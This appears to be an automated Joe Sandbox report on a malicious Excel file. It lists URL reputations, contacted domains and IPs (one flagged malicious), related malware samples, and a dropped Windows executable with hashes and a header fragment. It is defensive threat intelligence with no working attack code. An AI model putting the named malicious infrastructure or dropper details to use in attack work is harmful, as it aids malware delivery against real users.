https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	Avira URL Cloud	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://ovisualuiapp.azurewebsites.net/pbiagave/	0%	Avira URL Cloud	safe
https://directory.services.	0%	URL Reputation	safe
https://directory.services.	0%	URL Reputation	safe
https://directory.services.	0%	URL Reputation	safe
https://staging.cortana.ai	0%	URL Reputation	safe
https://staging.cortana.ai	0%	URL Reputation	safe
https://staging.cortana.ai	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
injuryless.com	193.178.169.243	true	true	8%, Virustotal, Browse	unknown
pigeonious.com	95.142.44.93	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://login.microsoftonline.com/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://shell.suite.office.com:1443	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://autodiscover-s.outlook.com/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://cdn.entity.	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://powerlift.acompli.net	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://cortana.ai	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://api.aadrm.com/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://api.microsoftstream.com/api/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://cr.office.com	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://portal.office.com/account/?ref=ClientMeControl	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://graph.ppe.windows.net	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://officeci.azurewebsites.net/api/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://store.office.cn/addinstemplate	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://globaldisco.crm.dynamics.com	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://store.officeppe.com/addinstemplate	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev0-api.acompli.net/autodetect	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.odwebp.svc.ms	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://web.microsoftstream.com/video/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://graph.windows.net	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://dataservice.o365filtering.com/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://ncus.contentsync.	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
http://weather.service.msn.com/data.aspx	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://apis.live.net/v5.0/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://management.azure.com	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://wus2.contentsync.	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://api.office.net	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://incidents.diagnosticssdf.office.com	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://entitlement.diagnostics.office.com	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://outlook.office.com/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://templatelogging.office.com/client/log	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://outlook.office365.com/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://webshell.suite.office.com	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://management.azure.com/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://login.windows.net/common/oauth2/authorize	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://graph.windows.net/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://devnull.onenote.com	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://ncus.pagecontentsync.	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://messaging.office.com/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://augloop.office.com/v2	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://skyapi.live.net/Activity/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/mac	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://dataservice.o365filtering.com	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.cortana.ai	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://ovisualuiapp.azurewebsites.net/pbiagave/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	Avira URL Cloud: safe	unknown
https://visio.uservoice.com/forums/368202-visio-on-devices	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://directory.services.	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://login.windows-ppe.net/common/oauth2/authorize	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high
https://staging.cortana.ai	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://loki.delve.office.com/api/v1/configuration/officewin32/	62CC7D8B-1994-4449-80B7-33F7D65A3F46.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.178.169.243	injuryless.com	unknown		48282	VDSINA-ASRU	true
95.142.44.93	pigeonious.com	Russian Federation		210079	EUROBYTEEurobyteLLCMoscowRussiaRU	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	432818
Start date:	10.06.2021
Start time:	19:28:46
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	3F97s4aQjB.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.expl.evad.winXLSX@5/12@2/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 53.5% (good quality ratio 49.2%) Quality average: 82.5% Quality standard deviation: 30.7%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, RuntimeBroker.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, MusNotifyIcon.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 40.88.32.150, 52.255.188.83, 52.109.88.177, 52.109.12.23, 52.109.88.37, 168.61.161.212, 104.43.139.144, 184.30.20.56, 51.103.5.159, 20.190.160.4, 20.190.160.73, 20.190.160.69, 20.190.160.75, 20.190.160.132, 20.190.160.129, 20.190.160.8, 20.190.160.71, 20.50.102.62, 20.54.26.129, 92.122.213.194, 92.122.213.247, 20.82.209.183, 20.75.105.140, 20.72.88.19, 20.190.159.137, 40.126.31.7, 40.126.31.2, 40.126.31.136, 40.126.31.5, 40.126.31.140, 20.190.159.131, 40.126.31.142, 40.127.240.158, 204.79.197.200, 13.107.21.200 Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, www.tm.a.prd.aadg.trafficmanager.net, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, dual-a-0001.a-msedge.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, skypedataprdcolcus16.cloudapp.net, www.tm.a.prd.aadg.akadns.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:29:44	API Interceptor	1x Sleep call for process: WMIC.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
193.178.169.243	tmp_Client-Status-062021-952177.vbs	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
injuryless.com	tmp_Client-Status-062021-952177.vbs	Get hash	malicious	Browse	193.178.169.243

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VDSINA-ASRU	uew5jAHqCT.exe	Get hash	malicious	Browse	109.234.38.213
	APPkj4zf3F.exe	Get hash	malicious	Browse	94.103.93.224
	tmp_Client-Status-062021-952177.vbs	Get hash	malicious	Browse	193.178.169.243
	N1LUjx76rV.exe	Get hash	malicious	Browse	109.234.35.229
	0izHwHXyfm.exe	Get hash	malicious	Browse	109.234.35.229
	gtJl8IPauk.exe	Get hash	malicious	Browse	109.234.35.229
	tAL6n3gs6p.exe	Get hash	malicious	Browse	109.234.35.229
	f1GoI1S7Qi.exe	Get hash	malicious	Browse	94.103.93.224
	SecuriteInfo.com.Troj.Kryptik-TR.10844.exe	Get hash	malicious	Browse	193.178.170.41
	SecuriteInfo.com.Troj.Kryptik-TR.30930.exe	Get hash	malicious	Browse	193.178.170.41
	S5.exe	Get hash	malicious	Browse	62.113.114.79
	A5A2471193648C16E45C9C053C8672A3F71F21862388C.exe	Get hash	malicious	Browse	94.103.85.106
	PZ33n8HQNu.exe	Get hash	malicious	Browse	62.113.119.33
	VofcOsB5QO.exe	Get hash	malicious	Browse	94.103.86.101
	8vH1bonSn8.exe	Get hash	malicious	Browse	94.103.86.101
	87PLLTuhpG.exe	Get hash	malicious	Browse	178.208.83.27
	AC09B75D9728CEA73319605AEE734B0B776E2D1677914.exe	Get hash	malicious	Browse	195.2.78.227
	file3.exe	Get hash	malicious	Browse	62.113.117.9
	6a867c08_by_Libranalysis.exe	Get hash	malicious	Browse	94.103.86.101
	3ef7f0d9_by_Libranalysis.exe	Get hash	malicious	Browse	62.113.117.9
EUROBYTEEurobyteLLCMoscowRussiaRU	template-jn02b3.dot	Get hash	malicious	Browse	95.142.40.220
	PREMIUM FINANCE AGREEMENT.docx	Get hash	malicious	Browse	95.142.40.241
	PREMIUM FINANCE AGREEMENT.docx	Get hash	malicious	Browse	95.142.40.220
	l8Cu5Vky6C.xls	Get hash	malicious	Browse	185.154.52.100
	l8Cu5Vky6C.xls	Get hash	malicious	Browse	185.154.52.100
	PooYhdlQZY.xls	Get hash	malicious	Browse	185.154.52.100
	PooYhdlQZY.xls	Get hash	malicious	Browse	185.154.52.100
	sUeyYgEiCb.xls	Get hash	malicious	Browse	185.154.52.100
	794c5aa1_by_Libranalysis.exe	Get hash	malicious	Browse	185.105.109.19
	njAzoIkDJu.exe	Get hash	malicious	Browse	185.105.109.19
	U92T8qzIbi.exe	Get hash	malicious	Browse	185.105.109.19
	rUUR0qQI22.exe	Get hash	malicious	Browse	185.105.109.19
	scan_DHL39382493.exe	Get hash	malicious	Browse	185.105.109.34
	3UiiwuZ4YR.exe	Get hash	malicious	Browse	95.142.44.135
	5WIxZYV73V.exe	Get hash	malicious	Browse	185.105.109.19
	0anROWjIhR.exe	Get hash	malicious	Browse	185.105.109.19
	fast.exe	Get hash	malicious	Browse	185.105.109.19
	kinsing2	Get hash	malicious	Browse	185.154.53.140
	kinsing	Get hash	malicious	Browse	185.154.53.140
	WVaiL4J4cc.exe	Get hash	malicious	Browse	185.105.109.19

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	WcCEh3daIE.xls	Get hash	malicious	Browse	95.142.44.93 193.178.169.243
	ATT00005.htm	Get hash	malicious	Browse	95.142.44.93 193.178.169.243
	kxjeAvsg1v.exe	Get hash	malicious	Browse	95.142.44.93 193.178.169.243
	VSA75RUmYZ.exe	Get hash	malicious	Browse	95.142.44.93 193.178.169.243
	iX22xMeXIc.exe	Get hash	malicious	Browse	95.142.44.93 193.178.169.243
	QWkt5w3cO2.exe	Get hash	malicious	Browse	95.142.44.93 193.178.169.243
	#U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTM	Get hash	malicious	Browse	95.142.44.93 193.178.169.243
	vTtOheCXBQ.exe	Get hash	malicious	Browse	95.142.44.93 193.178.169.243
	6b6zVfqxbk.xlsb	Get hash	malicious	Browse	95.142.44.93 193.178.169.243
	Check 57549.Html	Get hash	malicious	Browse	95.142.44.93 193.178.169.243
	audit-78958169.xlsb	Get hash	malicious	Browse	95.142.44.93 193.178.169.243
	Docc.html	Get hash	malicious	Browse	95.142.44.93 193.178.169.243
	askinstall39.exe	Get hash	malicious	Browse	95.142.44.93 193.178.169.243
	Lista e porosive.exe	Get hash	malicious	Browse	95.142.44.93 193.178.169.243
	askinstall39.exe	Get hash	malicious	Browse	95.142.44.93 193.178.169.243
	SecuriteInfo.com.Trojan.GenericKD.46459351.411.exe	Get hash	malicious	Browse	95.142.44.93 193.178.169.243
	Yl6482CO6U.exe	Get hash	malicious	Browse	95.142.44.93 193.178.169.243
	ZmZvKByoew.exe	Get hash	malicious	Browse	95.142.44.93 193.178.169.243
	V2GC02n03l.exe	Get hash	malicious	Browse	95.142.44.93 193.178.169.243
	research-1315978726.xlsb	Get hash	malicious	Browse	95.142.44.93 193.178.169.243

Dropped Files

No context

Created / dropped Files

C:\Users\Public\SettingSyncHost Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	511488
Entropy (8bit):	7.3404073760047375
Encrypted:	false
SSDEEP:	12288:cyLjvFCsHOFO7t8BmzXiDm/znL2wOhlYuGUoPavYWIJdvrQoDptkYIN:BLDFTHOF0anwGYuGDQ2vQoDk5N
MD5:	526D56017EF5105277FE0D366C95C39D
SHA1:	78A40D523F4B887B2383681FECE447EF911C24EF
SHA-256:	28F2FA4F9AC95C3FC906E201B758D56C6A888B657DCF57C351A4F34FFB3E0FE2
SHA-512:	F2DC53598455B422B6B53108E94229B0F5791AC25188F0ED73FB4BFF1DF018B745F1F73714E97CF4E1C52475473326C1C91DC6070D331080F1FAAF696D58841E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........p....,...,...,..,...,...,...,...,...,...,...,...,...,.).,...,..,...,...,...,Rich...,........................PE..L......`.....................~......#.............@..........................P............@.....................................(.......6.................... .......................................................................................text...9........................... ..`.rdata..............................@..@.data...\|....p.......X..............@....idata...............r..............@....rsrc...6............~..............@..@.reloc...#... ...$..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\62CC7D8B-1994-4449-80B7-33F7D65A3F46 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	134922
Entropy (8bit):	5.369120137160444
Encrypted:	false
SSDEEP:	1536:6cQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:qEQ9DQW+ziXOe
MD5:	0A1F23FF748ABC83EE1A72CDC88321CC
SHA1:	4BC44446EB9EFC70B3906CCB9C2027CFB370DC9A
SHA-256:	A05BF9F74150184E3664C14A9B042AF23BB0A75DBA671DB351A1172FF550A47B
SHA-512:	6CE5A0DC7CB9A2749451DE3752DCF2E8A37CFDC6B19C53E79782CC00859C1E4333474641E76EE975EAA169CE136E9A4A7771532866437CDBE49DEA5E8EE7047E
Malicious:	false
Reputation:	low
